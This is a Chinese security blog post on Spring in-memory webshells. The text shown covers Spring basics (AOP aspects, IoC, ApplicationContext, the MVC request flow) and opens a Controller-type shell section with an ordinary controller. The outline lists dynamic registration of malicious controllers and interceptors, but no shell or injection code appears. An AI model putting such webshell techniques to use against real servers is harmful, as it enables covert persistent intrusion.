<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/luo.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/luo.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/manifest.json">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"luokuang1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"show_result":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideDownBigOut"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="前置知识Spring是一个轻量级框架，它主要由七部分组成，分别是 Spring Core、 Spring AOP、 Spring ORM、 Spring DAO、Spring Context、 Spring Web和 Spring Web MVC Spring是一种轻量级IOC和AOP容器框架，对于IOC和AOP的简单介绍 AOP简单介绍AOP(Aspect Oriented Programmin">
<meta property="og:type" content="article">
<meta property="og:title" content="Spring内存马">
<meta property="og:url" content="https://luokuang1.github.io/2025/03/01/Spring%E5%86%85%E5%AD%98%E9%A9%AC/index.html">
<meta property="og:site_name" content="luokuang的博客">
<meta property="og:description" content="前置知识Spring是一个轻量级框架，它主要由七部分组成，分别是 Spring Core、 Spring AOP、 Spring ORM、 Spring DAO、Spring Context、 Spring Web和 Spring Web MVC Spring是一种轻量级IOC和AOP容器框架，对于IOC和AOP的简单介绍 AOP简单介绍AOP(Aspect Oriented Programmin">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://luokuang1.github.io/images/spring1.PNG">
<meta property="og:image" content="https://luokuang1.github.io/images/spring2.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring3.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring4.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring5.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring6.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring7.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring8.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring9.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring10.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring11.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring12.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring13.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring14.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring15.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring16.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring17.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring18.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring19.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring20.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring21.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring22.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring23.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring24.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring25.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring26.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring27.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring28.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring29.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring30.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring31.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring32.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring33.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring34.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring35.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring36.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring37.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring38.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring39.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring40.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring41.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring42.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring43.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring44.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring45.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring46.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring47.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring48.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring49.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring50.png">
<meta property="og:image" content="https://luokuang1.github.io/images/spring51.png">
<meta property="article:published_time" content="2025-03-01T02:39:23.000Z">
<meta property="article:modified_time" content="2025-03-01T03:08:50.243Z">
<meta property="article:author" content="luokuang">
<meta property="article:tag" content="java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://luokuang1.github.io/images/spring1.PNG">


<link rel="canonical" href="https://luokuang1.github.io/2025/03/01/Spring%E5%86%85%E5%AD%98%E9%A9%AC/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://luokuang1.github.io/2025/03/01/Spring%E5%86%85%E5%AD%98%E9%A9%AC/","path":"2025/03/01/Spring内存马/","title":"Spring内存马"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Spring内存马 | luokuang的博客</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="luokuang的博客" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">luokuang的博客</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#AOP%E7%AE%80%E5%8D%95%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.1.</span> <span class="nav-text">AOP简单介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#IOC%E6%9C%BA%E5%88%B6%E7%AE%80%E5%8D%95%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.2.</span> <span class="nav-text">IOC机制简单介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ApplicationContext"><span class="nav-number">1.3.</span> <span class="nav-text">ApplicationContext</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Spring-MVC"><span class="nav-number">1.4.</span> <span class="nav-text">Spring MVC</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#spring%E5%86%85%E5%AD%98%E9%A9%AC"><span class="nav-number">2.</span> <span class="nav-text">spring内存马</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Controller%E5%9E%8B%E5%86%85%E5%AD%98%E9%A9%AC"><span class="nav-number">2.1.</span> <span class="nav-text">Controller型内存马</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Controller-%E6%B3%A8%E5%86%8C%E6%B5%81%E7%A8%8B"><span class="nav-number">2.1.1.</span> <span class="nav-text">Controller 注册流程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9F%A5%E6%89%BE%E6%B5%81%E7%A8%8B%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90"><span class="nav-number">2.1.2.</span> <span class="nav-text">查找流程简单分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E6%B3%A8%E5%86%8C%E5%AE%9E%E7%8E%B0"><span class="nav-number">2.1.3.</span> <span class="nav-text">动态注册实现</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Interceptor%E5%9E%8B"><span class="nav-number">2.2.</span> <span class="nav-text">Interceptor型</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Interceptor%E5%AE%9E%E4%BE%8B%E5%88%9B%E5%BB%BA"><span class="nav-number">2.2.1.</span> <span class="nav-text">Interceptor实例创建</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%B0%83%E7%94%A8%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90"><span class="nav-number">2.2.2.</span> <span class="nav-text">调用流程分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E6%B3%A8%E5%86%8C%E5%AE%9E%E7%8E%B0-1"><span class="nav-number">2.2.3.</span> <span class="nav-text">动态注册实现</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="luokuang"
      src="/images/luo.jpg">
  <p class="site-author-name" itemprop="name">luokuang</p>
  <div class="site-description" itemprop="description">沉淀，还得继续沉淀</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://luokuang1.github.io/2025/03/01/Spring%E5%86%85%E5%AD%98%E9%A9%AC/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/luo.jpg">
      <meta itemprop="name" content="luokuang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="luokuang的博客">
      <meta itemprop="description" content="沉淀，还得继续沉淀">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Spring内存马 | luokuang的博客">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Spring内存马
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2025-03-01 10:39:23 / Modified: 11:08:50" itemprop="dateCreated datePublished" datetime="2025-03-01T10:39:23+08:00">2025-03-01</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><p>Spring是一个轻量级框架，它主要由七部分组成，分别是 Spring Core、 Spring AOP、 Spring ORM、 Spring DAO、Spring Context、 Spring Web和 Spring Web MVC</p>
<p>Spring是一种轻量级IOC和AOP容器框架，对于IOC和AOP的简单介绍</p>
<h3 id="AOP简单介绍"><a href="#AOP简单介绍" class="headerlink" title="AOP简单介绍"></a>AOP简单介绍</h3><p>AOP(Aspect Oriented Programming) 面向切面编程，它与OOP(面向对象编程)类似，常常用于对于某一事件集中处理，AOP的组成</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">切面（Aspect）:定义 AOP 是针对某个统一的功能的，这个功能就叫做一个切面，比如用户登录功能或方法的统计日志，他们就各是一个切面。切面是由切点和通知组成的</span><br><span class="line">连接点（Join Point）:所有可能触发 AOP（拦截方法的点）就称为连接点</span><br><span class="line">切点（Pointcut）:切点的作用就是提供一组规则来匹配连接点，给满足规则的连接点添加通知，总的来说就是，定义 AOP 拦截的规则的,切点相当于保存了众多连接点的一个集合（如果把切点看成一个表，而连接点就是表中一条一条的数据）</span><br><span class="line">通知（Advice）:切面的工作就是通知</span><br><span class="line">通知：规定了 AOP 执行的时机和执行的方法</span><br></pre></td></tr></table></figure>
<p>如下图所见</p>
<p><img src="/images/spring1.PNG" width="100%" height="80%"></p>
<p>几个常见的注解</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Aspect</span>  <span class="comment">//标识一个切面</span></span><br><span class="line"><span class="meta">@Pointcut(&quot;&quot;)</span> <span class="comment">//定义一个切点</span></span><br><span class="line"><span class="meta">@Before</span> <span class="comment">//通知方法会在目标方法调用之前执行</span></span><br><span class="line"><span class="meta">@After</span> <span class="comment">//通知方法会在目标方法返回或者抛出异常后调用</span></span><br><span class="line"><span class="meta">@AfterReturning</span> <span class="comment">//通知方法会在目标方法返回后调用</span></span><br><span class="line"><span class="meta">@AfterThrowing</span> <span class="comment">//通知方法会在目标方法爬出异常之后调用</span></span><br><span class="line"><span class="meta">@Around</span> <span class="comment">//通知包裹了被通知的方法，在被通知的方法通知之前和调用之后执行自定义的行为</span></span><br></pre></td></tr></table></figure>
<p>举个简单的例子</p>
<p>maven依赖导入</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- https:<span class="comment">//mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-aop --&gt;</span></span><br><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;spring-boot-starter-aop&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;<span class="number">3.1</span><span class="number">.0</span>&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>
<p>创建一个简单的请求类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@RestController</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UserController</span> &#123;</span><br><span class="line">    <span class="meta">@RequestMapping(&quot;/say1&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">sayHi</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;luokuang1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@RequestMapping(&quot;/say2&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">sayHi2</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;luokuang2&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>下面就是添加切面的过程</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Aspect</span> <span class="comment">//标识为一个切面</span></span><br><span class="line"><span class="meta">@Component</span> <span class="comment">//标识为一个bean</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">useraop_test1</span> &#123; </span><br><span class="line">    <span class="comment">//通过Pointcut定义一个切点</span></span><br><span class="line">    <span class="comment">//如@Pointcut(&quot;execution(* com.service.*.*(..))&quot;)</span></span><br><span class="line">    <span class="meta">@Pointcut(&quot;execution(* org.example.spring_neicunma.controller.UserController.*(..))&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">pointcut</span><span class="params">()</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Before(&quot;pointcut()&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">before</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;before&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@After(&quot;pointcut()&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">after</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;after&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@AfterReturning(&quot;pointcut()&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">afterReturning</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;afterReturning&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@AfterThrowing(&quot;pointcut()&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">afterThrowing</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;afterThrowing&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Around(&quot;pointcut()&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> Object <span class="title function_">around</span><span class="params">(ProceedingJoinPoint pjp)</span> <span class="keyword">throws</span> Throwable &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;around&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> pjp.proceed();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>运行结果如下</p>
<p><img src="/images/spring2.png" width="100%" height="80%"></p>
<p>还有很多的其它用法，这里就不详细介绍了，具体可以看看<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_58761900/article/details/128999827">这篇文章</a></p>
<h3 id="IOC机制简单介绍"><a href="#IOC机制简单介绍" class="headerlink" title="IOC机制简单介绍"></a>IOC机制简单介绍</h3><p>IoC(Inversion of Control)，在软件工程领域，控制反转技术是对象或程序的一部分的控制被转移到容器或框架中，它常用于面向对象编程的上下文（Context）中</p>
<p>在IoC机制中存在一个依赖注入DI(Dependency Injection)，简单来说就是反转</p>
<p>以前我们处理一个对象的方法如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 新建一个对象，并引用另外一个对象，通过new实现</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test</span>&#123;</span><br><span class="line">        <span class="keyword">private</span> Person sc;</span><br><span class="line">        <span class="keyword">public</span> <span class="title function_">TestEditor</span><span class="params">()</span>&#123;</span><br><span class="line">                sc = <span class="keyword">new</span> <span class="title class_">Person</span>();</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>但是这里可以直接通过DI反转，这里就可以不用实例化而是通过方法传入，关于传入的类可以是由其子类对象</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 通过构造器注入另外一个对象</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test1</span>&#123;</span><br><span class="line">        <span class="keyword">private</span> Person sc;</span><br><span class="line">        <span class="keyword">public</span> <span class="title function_">TestEditor</span><span class="params">(Person sp)</span>&#123;</span><br><span class="line">                <span class="built_in">this</span>.sc = sp;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里对于sc的实例化与TestEditor无关而是由Spring Framework控制，更为灵活，传入的对象也可以是其子类，控制流已经被依赖注入（DI）”反转”，因为已经有效地将依赖性委托给某些外部系统</p>
<p><strong>IoC</strong> <strong>的关键概念：</strong>Bean 和 BeanFactory <strong>Bean</strong>：Spring 中的 Bean 是由 IoC 容器管理的对象，通常是一个普通的 Java 类。 <strong>BeanFactory</strong>：是 Spring IoC 容器的顶级接口，负责管理 Bean 的生命周期和依赖关系。常用的实现类包括 XmlBeanFactory 和 DefaultListableBeanFactory</p>
<p>创建一个Bean一般是通过注解来标识，但是各种的注解其实都是一样的作用用于标识是一个bean，对于不同的注解只是为了好区分</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Component</span>、<span class="meta">@Service</span>、<span class="meta">@Repository</span>、<span class="meta">@Controller</span></span><br></pre></td></tr></table></figure>
<p>Bean的生命周期</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">实例化（Instantiation）。</span><br><span class="line">属性赋值（Property Population）。</span><br><span class="line">初始化前（BeanPostProcessor 前置处理）。</span><br><span class="line">初始化方法或调用 <span class="meta">@PostConstruct</span> 注解的方法。</span><br><span class="line">初始化后（BeanPostProcessor 后置处理）。</span><br><span class="line">Bean 使用（例如调用业务方法）。</span><br><span class="line">销毁前（调用 <span class="meta">@PreDestroy</span> 注解的方法）。</span><br><span class="line">销毁后（Bean 被从容器中移除）</span><br></pre></td></tr></table></figure>
<h3 id="ApplicationContext"><a href="#ApplicationContext" class="headerlink" title="ApplicationContext"></a><strong>ApplicationContext</strong></h3><p>在Spring里面，BeanFactory就是IoC 容器的实际代表，对于常见的BeanFactory的继承类如下</p>
<p><img src="/images/spring3.png" width="100%" height="80%"></p>
<p>而在ApplicationContext的父类里面就有两个继承类，这里就相当于间接实现了BeanFactory，所以ApplicationContext也相当于代表了IoC</p>
<p><img src="/images/spring4.png" width="100%" height="80%"></p>
<p>下面对于ApplicationContext的实现类的介绍</p>
<p><img src="/images/spring5.png" width="100%" height="80%"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ClassPathXmlApplicationContext：基于类路径下的 XML 文件进行配置。</span><br><span class="line">AnnotationConfigApplicationContext：基于 Java 注解进行配置。</span><br><span class="line">WebApplicationContext：专门为 Web 应用设计的上下文，Spring MVC 项目中通常会用到。</span><br></pre></td></tr></table></figure>
<h3 id="Spring-MVC"><a href="#Spring-MVC" class="headerlink" title="Spring MVC"></a>Spring MVC</h3><p>对于学习Spring内存马，需要了解Spring MVC模块，spring MVC的运行流程</p>
<p><img src="/images/spring6.png" width="100%" height="80%"></p>
<p>简单来说，就是当客户端发送Request请求时，DispatcherServlet(控制器)就会通过访问HandlerMapping来对URL进行解析，并且由它来决定是通过哪个Controller处理，最后通过Controller容器来处理再进行返回</p>
<h2 id="spring内存马"><a href="#spring内存马" class="headerlink" title="spring内存马"></a>spring内存马</h2><p>Spring 内存马一般分为 Controller 型和 Interceptor 型内存马</p>
<p>都需要 SpringMVC 的依赖，一般的springboot项目里面都会有，所以这里就不需要导入依赖了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;org.springframework&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;spring-webmvc&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;<span class="number">5.2</span><span class="number">.10</span>.RELEASE&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>
<h3 id="Controller型内存马"><a href="#Controller型内存马" class="headerlink" title="Controller型内存马"></a>Controller型内存马</h3><p>在学习完Tomcat内存马，我们就可以大致了解对于一个内存马注入过程是什么样的，实现是如何创建对应类型的方法，而后才是尝试将其注入</p>
<p>首先普通的Controller的创建</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@RestController</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UserController</span> &#123;</span><br><span class="line">    <span class="meta">@RequestMapping(&quot;/say1&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">sayHi</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;luokuang1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@RequestMapping(&quot;/say2&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">sayHi2</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;luokuang2&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
